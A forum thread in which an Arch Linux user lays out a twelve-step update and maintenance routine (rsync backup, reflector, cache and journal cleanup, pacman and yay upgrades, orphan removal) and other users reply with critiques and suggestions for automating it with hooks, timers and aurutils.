Hello. Please critique how I’m updating / maintaining my new Arch installation so I can fix anything I’m doing wrong. This is mostly what I could gather from the Arch wiki tailored to my system. I think I know what I’m doing - but as I’ve often learned, it’s easy to misunderstand or overlook some things.
Step 1: perform an incremental full system backup so I have something to restore if the update borks anything. I’ve chosen to use the rsync command as laid out on the wiki:
sudo rsync -aAXHv --delete --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /media/linuxhdd/archrsyncbackup
I have a large hdd mounted as a secondary drive under /media/linuxhdd. It is configured to automatically mount from fstab using uuid. Both my root drive and that hdd are formatted ext4. I’m not using the -S option because I don’t think I’ll be using virtual machines (I have other hard drives I can make bootable). --delete is used so I maintain one current set of files for restore purposes. This keeps the copying and transfer time to a minimum. (I maintain disk images offline with a different tool - this is simply one local copy for easy restoration purposes)
Step 2: Check the Arch wiki - follow instructions for any manual steps
Step 3: once every 1-2 months, update the mirror list using reflector
sudo reflector --protocol https --verbose --latest 25 --sort rate --save /etc/pacman.d/mirrorlist
This should sort the fastest 25 mirrors into mirrorlist. Remember to use the -Syyu option in step 6 if this step was done
Step 4: Clean the journal
sudo journalctl --vacuum-time=4weeks
This should keep 4 weeks of files.
Step 5: Clean the cache
sudo paccache -r
This should keep no more than 3 versions laying around. Once and a while, I can clean out all uninstalled packages with -ruk0 options instead.
Step 6: Upgrade Arch packages with pacman
sudo pacman -Syu
I need to watch for pacnew and pacsave files and deal with them (although I haven’t seen any yet)
Step 7: Review the pacman log
nano /var/log/pacman.log
This should tell me about any warnings, errors, instructions, or other things I need to deal with.
Step 8: Remove Orphans
pacman -Qtdq | sudo pacman -Rns -
This could be recursive and needs to be run more than once. Instead, I’ll just run it once every time I update. This should keep things cleaned out.
Step 9: Update AUR packages
Check the build scripts to make sure the package hasn’t been taken over and that it won’t run anything funny.
yay -Sua
This should update just the AUR packages
Step 10: Remove AUR orphans
yay -Yc
The wiki says this “removes unnecessary dependencies” which I believe means AUR-only orphan packages.
Step 11: Reboot
reboot
Step 12: Update flatpaks from the GUI (Gnome–>Software–>Updates)
Any mistakes? Suggestions?
Thanks!
Just so that you have an additional data point, here’s how I do it.
I run a backup first, using
borg-backup
. I usedrsync
in the past, thenrsnapshot
and now borg since it allows for compressed incremental backups, diffing on the “chunk” level, meaning I won’t backup the entirety of a modified file again and safe a lot of space.I used
yay
before, but like you I didn’t want to go into it blindly and do some modicum of sanity-checking the PKGBUILD for changes beforehand. Since it wasn’t obvious on what would be the best way of usingyay
for doing this, I asked around on the ArchLinux Forum, and ultimately decided to try one of the simpler tools suggested in the Arch Wiki,aurutils
.After setting it up (the author helped me migrate), I now use it as follows:
aur repo --upgrades
: Searches for new versions of aur packages and displays themaur sync --upgrades --no-build
: Performs a git-pull under~/.cache/aurutils/sync
and opensvifm
so that I can look at a diff of the PKGBUILD and all the other changes in the affected directory.aur sync --upgrades --no-view
: Builds the package. It is now available as part of the custom (local) repository used only for aur packages, but hasn’t been upgraded yet. That is, apackage.tar.gz
or whatever has been created and put into~/.cache/aurutils/sync/
, where thePKGBUILD
resides as wellsudo pacman -Syu
: Upgrades all packages from all repositories, including the ones from the custom repository
I won’t argue pro or against one aur helper or the other, but I feel like I have a little more insight about what happens under the hood since I made the switch. That being said, in the very beginning, I managed aur packages manually. This works also, but at some point became too tedious for my taste. I am happy with the semi-automatic approach I am using now.
So yeah. If I needed a 12 step process to update my system it would still run kernel 4 :D (I’m lying of course) but i really don’t do as much as you and I don’t do more than necessary manually. Basically I run 2 commands to update:
update
which runs the update process more below.clean
which removes orphans and cleans the cache
So
update
is the alias where the magic happens and it does the following:- It runs
sudo pacman -Syu
checking with the Informant hook if there are any unread news, if so it stops the update. Otherwise it just runs through it. - Then it runs
pacdiff
to check if any config files changed (I ran into an issue with that before where I didn’t check properly and suddenly couldn’t login anymore. - Then, if flatpak is installed it will also update all flatpaks.
So my only manual intervention is “accepting” the news if there are any. Accepting the updates. And (of necessary) merging the pacnews. This way I have kept a fresh and stable system for a couple of years now.
TL;DR
I’d advise you to automate backups as incremental daily backups, automate reflector, clearing paccache and rebuilding initramfs/grub config.- My system automatically backups at 4 am or boot time anyway, with basically the same command as you (also excluding games, caches 'n stuff).
yay -Pw
should show you unread news.- reflector can be run as a systemd service
- For me, the journal never grew to a large size, despite not being cleared for any of my systems. Also useful for checking logs on systems where some errors may stay undetected for weeks, like servers (which I do run, successfully, without problems at all, on Arch testing repos. Even arch for arm works without any problems at all).
- There’s a pacman hook in the AUR that automatically clears the cache to the last three versions, or what you want. My yay cache is ~60 GB tho, which is more than the rest of my system combined. Still not an issue, as it is excluded for backups and I can just clear it or change the limit.
- As yay basically just invokes pacman -Syu, that step is actually pretty redundant.
- Errors should be outputted at runtime of pacman/yay, so as long as you don’t have 200 pkgs to update you could monitor normal and AUR packages at once.
- If packages are removed from dependencies they should be uninstalled automatically I believe and using
pacman -Rs
should remove packages that were only installed for the package you are removing. (Btw, -n removes config files too, if you don’t want them anymore). Despite that, I do check for orphans etc. when I feel like I want to clean my system(s). - Just
yay
upgrades AUR and pacman pkgs, as said in 6. - Just as 8, orphans shouldn’t happen anyway. Though I did not know about the AUR specific command, thank you!
- As I’m, not even joking, updating and “newest software” addicted, rebooting every time is very annoying, especially for servers. Luckily, as I update extremely often, it’s mostly very few packages so I can quickly decide if to reboot or not. In general, packages like screen or python can be ignored. Packages like sshd can be reloaded by just restarting the service (
systemctl restart sshd
). Only kernel, CPU-ucodes and drivers are a real update trigger for me. - I don’t have flatpaks, and eg. pip is redundant as my python packages are managed by pacman/yay. So it’s just yay to worry about.
Also, you missed a little but important step: Recompiling initramfs and the grub config (If you use grub, that is). If so, there’s also a hook for that.
Of course, just automating everything screams for errors and system crashes - if not checked. I’d also advise you to check
systemctl status
regularly, as it can inform you of failed (critical) services, like backups, DynDNS or just shadow.service informing you there’s a user missing/extra in /etc/shadow (which is the password file, btw).In conclusion, many things could be done as service automatically, are redundant or could be done less often. Though I must say, it is better to do everything explicitly and with care, like you do, than to skip over things.
you can automate some parts of that away or can be combined
most AUR helper will basically invokepacman -Syu
internally before actually upgrading any AUR package (as otherwise this can lead to issues)
yay in particular can just be called viayay
(no arguments) which is an alias ofyay -Syu
Point 3: reflector.timer comes with reflector now and runs weekly by default, you need to configure and enable it though
https://wiki.archlinux.org/title/Reflector#systemd_timerPoint 4: you can restrict the journal size to much smaller than it is by default (10% of the partition size OR maximum 4 GB): https://wiki.archlinux.org/title/Systemd/Journal#Journal_size_limit
or alternativly setMaxRetentionSec
to 2419200 seconds (4 weeks)Point 5: can be done via pacman hook automatically after every upgrade
example: https://aur.archlinux.org/packages/pacman-cleanup-hookthere are also many other useful pacman hooks which tell you if there are any orphans or if AUR packages need to be rebuild or there is a hook which reload kernel modules after a kernel upgrade (which otherwise would warrant a reboot unless you are ready for the issues of many unloaded kernel modules)